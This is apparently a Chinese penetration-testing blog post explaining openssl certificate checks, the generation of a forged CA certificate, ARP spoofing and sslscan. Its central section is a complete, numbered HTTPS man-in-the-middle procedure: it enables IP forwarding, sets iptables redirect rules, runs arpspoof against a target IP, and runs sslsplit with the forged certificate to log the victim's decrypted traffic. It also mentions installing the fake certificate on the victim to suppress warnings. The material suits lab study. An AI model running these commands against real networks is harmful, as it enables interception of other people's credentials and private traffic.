https攻击工具详解(arp欺骗、中间人攻击)(openssl+sslscan+sslsplit )

已于 2022-03-07 16:36:13 修改
阅读量5.1k 收藏 10
点赞数
分类专栏: 渗透测试 文章标签: ssl
于 2022-03-05 17:38:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48907714/article/details/123295461
版权

https攻击(openssl+sslscan+SSLsolit)

**

openssl

**
识别ssl的签发单位、证书信息等
可以伪造证书

  • openssl 直接调用openssl库识别目标服务器支持的SSL/TLS(传输层安全)
    -openssl s_client www.taobao.com:443
    在这里插入图片描述
    上图的GlobalSign Organization Validation CA是SSL协议证书的颁发公司
  • openssl s_client -connect 查看证书信息
    openssl s_client -connect www.taobao.com:443
  • openssl s_client -tlsl_2 -cipher “NULL,EXPORT,LOW,DES” 协商低安全级别cipher suite服务器不响应 必须有四到五种加密组合才能构成SSL
    openssl s_client -tlsl_2 -cipher "NULL,EXPORT,LOW,DES" www.baidu.com:443
    在这里插入图片描述
  • openssl ciphers -v "NULL,EXPORT,LOW,DES" 列出已知不安全ciper(加密组合套件)组合
    在这里插入图片描述

openssl伪造证书

第一步先生成私钥(注意生成的位置)
openssl genrsa -out ca.key 2048

2048是长度 大多数证书长度都是2048

第二部生成证书(注意生成的位置)
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

new是新生成的 509是标准 days是有效时间 key是用那个私钥生成 crt是证书格式

最后下面按照提示填写国家CN 省Shangxi 城市Taiyuan 组织名称 组织单位名字 常用的FQDN名称 邮箱地址

**

sslscan、sysctl、arpspoof 中间人攻击、arp欺骗工具

**

  1. 先解释一下什么是arp欺骗,也就是中间人攻击
  • 首先以太网当中,网络设备之间互相通信用的是mac而不是IP地址 ARP协议就是将IP地址转换成MAC地址的,RARP正好相反。
  • 假设A(192.168.1.2)与B(192.168.1.3)在同一局域网,A要和B实现通信。A首先会发送一个数据包广播到局域网广播地址192.168.1.255(假设),该数据包内包含了源IP(A)、源MAC、目的IP(B)、目的MAC,这个数据包会被发放给局域网中所有的主机,但只有B主机会回复一个包含了源IP(B)、源MAC、目的IP(A)、目的MAC的数据包给A,同时A主机会将返回的这个地址保存在ARP缓存表中。
  • 在ARP缓存表机制存在一个缺陷,就是当请求主机收到ARP应答包后,不会去验证自己是否向对方主机发送过ARP请求包,就直接把这个返回包中的IP地址与MAC地址的对应关系保存进ARP缓存表中,如果原有相同IP对应关系,则原有的会被替换。
  • 双向欺骗,就是双方都骗一次,单向就是只骗一个
  • arp -a可以查看arp缓存表

arp欺骗过程

伪造服务器首先要伪造证书

  1. 启动功能sysctl -w net.ipv4.ip_forward=1
  2. 清空iptables表内信息iptables -t nat -F
  3. 列出iptables表内信息,查看是否为空iptables -t nat -L,不为空则进行第二部清空
  4. 确认端口80和443是否被占用netstat -pantu | grep :80 netstat -pantu | grep :443 如果没有回显则表示没有被占用
  5. 开始写iptables规则iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

-t 使用哪张表
PREROUTING 在路由之前就生效
-p tcp 使用tcp协议
80 REDIRECT 8080将80端口的流量重定向给8080

  1. 写iptables规则iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
  2. 查看iptables表iptables -t nat -L信息
  3. arp欺骗开始arpspoof -i eth0 -t 192.168.72.8 -r 192.168.72.2 -i是网卡,-t是被欺骗的IP,-r是服务器的地址
  4. 查被欺骗主机的arp表,发现mac地址已经改变
  5. 记录被欺骗主机请求信息sslsplit -D -l 1.log -j /root/Desktop/test/ -S /root/Desktop/test/aaa -k /root/Desktop/ca.key -c /root/Desktop/ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

-D 查看debug信息
-l 连接请求过程记录到某个文件
-S请求详细过程记录到某个文件
-k 密钥
-c 证书
ssl 指向8443
tcp指向8080
0.0.0.0谁都可以访问

  1. 现在打开被劫持主机,浏览百度,发现显示不是安全的连接,文件内存在了信息,证明劫持成功
  2. 如果在这个时候,将最早生成的证书导入到被挟持主机上,则不会报错
  3. 报错的原因、、、、

**

sslscan

**

  • 自动识别SSL配置错误、过期协议、过时cipher suite(加密组合套件)和hash算法
  • 默认会检查CRIME、heartblleed漏洞(后者心脏出血漏洞 错误原因:缓冲区过读,即可以读取的数据比英国允许读取的还多)
  • 绿色表示安全,红色黄色需要引起注意

sslscan url 跟下面加参数是一样的结果

-tlsall
sslscan -tlsall www.taobao.com:443
检测TSL有没有漏洞
支持的cipher suite(加密组合套件)算法
DNS解析记录

百密不疏
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSL扫描sslscan
09-13
ssl扫描,sslscan,tls版本确认,扫描服务器端支持的ssl/tls版本及加密算法,tls加密算法确认,ssl版本确认
SSLScan:安全扫描利器,守护您的网络连接
gitblog_00014的博客
03-23 764
SSLScan:安全扫描利器,守护您的网络连接 项目地址:https://gitcode.com/rbsec/sslscan SSLScan 是一个轻量级的命令行工具,专为检测服务器支持的SSL/TLS加密套件和弱安全性配置而设计。它能够快速、全面地评估目标服务器的加密特性,帮助管理员和安全研究人员发现潜在的安全隐患。 技术解析 SSLScan基于Ruby语言开发,利用了OpenSSL库进行加密协...
网络安全的第一道防线:深入探索sslscan在SSL/TLS证书安全检测中的原理与实践
HUANGXIN9898的博客
04-30 1007
sslscan用于扫描SSL/TLS证书并报告协议版本、密码套件、密钥交换、签名算法和证书详细信息等,帮助用户从安全角度加强数据传输安全性,同时,sslscan还可以将结果输出到XML文件中,以便外部程序使用。本文将详细介绍sslscan用法案例及其扫描原理。颜色密码套件红色背景空套件红色字体破损套件(
sslscan工具在密评中的使用
weixin_44535758的博客
10-25 5507
sslscan工具在密评中的使用
sslscan详解:安装、使用、原理、示例
热门推荐
qq_42696904的博客
12-27 2万+
一、安装sslscan 1、git下载sslscan源码       [root@localhost ~]# git clone https://github.com/rbsec/sslscan 2、进入目录       [root@localhost ~]# cd sslscan 3、编译安装       [root@localhost sslscan]# make static ...
sslscan的使用
JSH_CDX的博客
07-02 3819
一.sslscan的原理 1.sslscan通过创建多个https的连接来试探服务器支持的加密方式; 2.当使用https连接到服务器的时候,会交换双方所支持的加密方式,之后选择双发都能支持的方式进行通信; 3.如果https服务器配置不当,就会存在MITM攻击攻击者就可以通过客户端支持的弱加密算法来欺骗服务器; 4.假如使用的是SSLV2的56位DES,当攻击者拦截并使用了这种加密流量过后,可能在很短时间之内就能够破解加密密钥。 二.sslscan的功能 sslscan能够检测heartbleed,这
识别HTTPS加密参数
2301_77324496的博客
09-26 304
在某种程度上,我们习惯于假设,当连接使用带有 SSL/TLS 加密的 HTTPS 时,它是安全的,任何拦截它的攻击者只会收到一系列无意义的数字。当然,这可能不是绝对正确的,这需要正确地配置HTTPS 服务器,以提供强大的加密层,并保护用户免受中间人(MITM)攻击或密码分析。在SSL协议的实现和设计中发现了许多漏洞,并且发现其继任者 TLS 在某些配置下也很脆弱,因此在任何 web 应用程序渗透测试中都必须对安全连接进行测试。
基于ssl中间人攻击例子
09-23
实现一个ssl的客户端和服务端,作为中间人攻击,截取ssl通讯中的密文数据,并进行解密,使用时用把所有的报文都转向给程序所在的机器。
openssl+libnl.rar
06-08
OpenSSL与Libnl:构建安全网络通信的基石》 在信息技术领域,安全性和网络通信是两个至关重要的概念。OpenSSL和Libnl是为实现这些目标而开发的两个关键库,它们在各种软件项目中发挥着核心作用。下面将详细探讨这...
基于openssl+qt开发的P2P文件加密传输工具+源码
最新发布
06-10
用法链接:https://menghui666.blog.csdn.net/article/details/139572645?spm=1001.2014.3001.5502 该项目实现了P2P的文件加密传输功能,具体包含如下功能: 1、 多文件多线程传输 2、rsa+aes文件传输加密 3、秘钥...
windows下Curl+Openssl访问https实例
09-04
在Windows环境下,使用Curl和OpenSSL访问HTTPS网站是一个常见的任务,特别是在开发涉及网络通信的C++应用程序时。本文将详细介绍如何在Windows下利用Curl和OpenSSL库实现HTTPS访问,并提供一个实例来帮助理解这一...
sslscansslscan测试启用SSLTLS的服务以发现受支持的密码套件
02-23
sslscan2 sslscan版本2现在已经发布。 这包括对后端扫描代码的重大重写,这意味着许多检查不再依赖于OpenSSL的版本。 这意味着有可能支持旧版协议(SSLv2和SSLv3),以及支持TLSv1.3-不论已针对其编译的OpenSSL版本如何。 的工作使这成为可能,后者负责大部分后端重写。 其他主要更改包括: 枚举服务器密钥交换组。 服务器签名算法的枚举。 扫描SSLv2和SSLv3协议支持,但不扫描单个密码。 使用Docker附带了一个测试套件,以验证sslscan是否正常运行。 删除了--http选项,因为该选项已损坏并且最初使用很少。 XML输出变更 对版本2.0.0-beta4中的XML输出进行了潜在的重大更改。 以前,可以返回多个<certificate>元素(默认情况下一个,如果--show-certificate则第二个)。 关键更改是: 新的
基于openssl 自行签发https 协议证书 openssl+nginx实现https自签有效加密实战记录
03-30
"基于openssl自行签发https协议证书openssl+nginx实现https自签有效加密实战记录" 本篇文章主要讲述了使用openssl自行签发https协议证书,并使用nginx实现https自签有效加密的实战记录。文章包含了证书签发、nginx...
SSLScan工具 获取SSL信息
墨痕诉清风的博客
06-21 1594
如果https服务器配置不当,就会存在MITM攻击攻击者就可以通过客户端支持的弱加密算法来欺骗服务器,假如使用的是SSLV2的56位DES,当攻击者拦截并使用了这种加密流量过后,可能在几天或者几小时之内就能够破解加密密钥。第二部分告诉了我们服务器支持的加密算法,以及服务器首选的加密算法(如果客户端支持,服务器会尝试使用prefered的算法进行通信)在某种程度上,我们认为HTTPS是安全的,攻击者得到的数据都是加密后的乱码,但是随着技术的发展,这并不是绝对的。Kali 中也有另一个工具叫做。
安装sslscan
weixin_38437520的博客
11-24 2083
安装sslscan 1.yum install git gcc 2.git clone https://github.com/rbsec/sslscan 3.wget http://www.zlib.net/zlib-1.2.11.tar.gz tar zxvf zlib-1.2.11.tar.gz cd zlib-1.2.11 ./configure make test make i...
使用 Linux 安全工具进行渗透测试
2301_76694151的博客
04-23 195
使用 Kali Linux 和其他开源工具来发现系统中的安全漏洞和弱点。众多被广泛报道的大型消费企业入侵事件凸显了系统安全管理的重要性。幸运的是,有许多不同的应用程序可以帮助保护计算机系统。其中一个是 Kali,一个为安全和渗透测试而开发的 Linux 发行版。本文演示了如何使用 Kali Linux 来审视你的系统以发现弱点。Kali 安装了很多工具,它们都是开源的,默认情况下安装了它们会让事情变得更容易。
linux. sslscan命令,使用sslscan获得SSL/TLS信息
weixin_39876282的博客
05-12 2656
SSLscan主要探测基于ssl的服务,如httpsSSLscan是一款探测目标服务器所支持的SSL加密算法工具SSLScan queries SSL services, such as HTTPS, in order to determine the ciphers that are supported. SSLScan is designed to be easy, lean and fa...
HTTPS 钓鱼攻击:黑客如何使用 SSL 证书假装信任
lavin1614
12-29 1424
让我们回到 1994 年。无需翻出寻呼机或穿上法兰绒衬衫。这是第一个 SSL 协议诞生的一年。它由 Netscape 推出,以满足对称为 Internet 的新奇发明增加安全性的日益增长的需求。后来出现了几个版本的 SSL,它最终变成了我们今天所知道的 TLS。然而,就像一个糟糕的昵称一样,我们仍然将 TLS 称为 SSL。自 Web 浏览器问世以来,SSL 的安全性问题一直存在。网络罪犯喜欢使用 SSL 证书实施网络钓鱼诈骗,并将其伪装成受信任的站点。
arp欺骗获取https网站的登录信息
I_WORM的博客
12-17 1004
arp攻击获取https登录信息实操
openssl中间人攻击
05-15
openssl 中间人攻击是一种网络安全攻击方式,也称为 SSL 中间人攻击,它利用了传输层安全协议(TLS/SSL)中的漏洞,使得攻击者能够窃取双方的通信内容。攻击者通过伪造一个虚假的证书,来欺骗双方认为他们正在与合法的对方通信,从而可以窃取双方的敏感信息,例如用户名、密码等。 实现中间人攻击需要满足以下几个步骤: 1. 攻击者向服务器发送连接请求,并伪装成客户端。 2. 服务器向攻击者发送其公钥。 3. 攻击者接收到公钥后,再伪装成服务器,向客户端发送伪造的公钥。 4. 客户端接收到伪造的公钥后,认为其是真实的服务器公钥,并生成一个随机数作为会话密钥,并使用伪造的公钥进行加密。 5. 攻击者接收到加密数据后,使用自己的私钥进行解密,并可以窃取其中的敏感信息。 6. 攻击者再使用真实的服务器公钥对数据进行加密,并将其发送给服务器,以保证双方通信正常进行,从而不被发现。 为了避免中间人攻击,可以采取以下措施: 1. 使用 HTTPS 协议代替 HTTP 协议,以保证通信过程中数据的加密和完整性。 2. 在使用 HTTPS 协议时,尽量使用双向认证方式,验证服务器和客户端的身份。 3. 不要在公共 Wi-Fi 网络中进行敏感信息的传输。 4. 及时更新操作系统和应用程序,以避免已知漏洞的利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值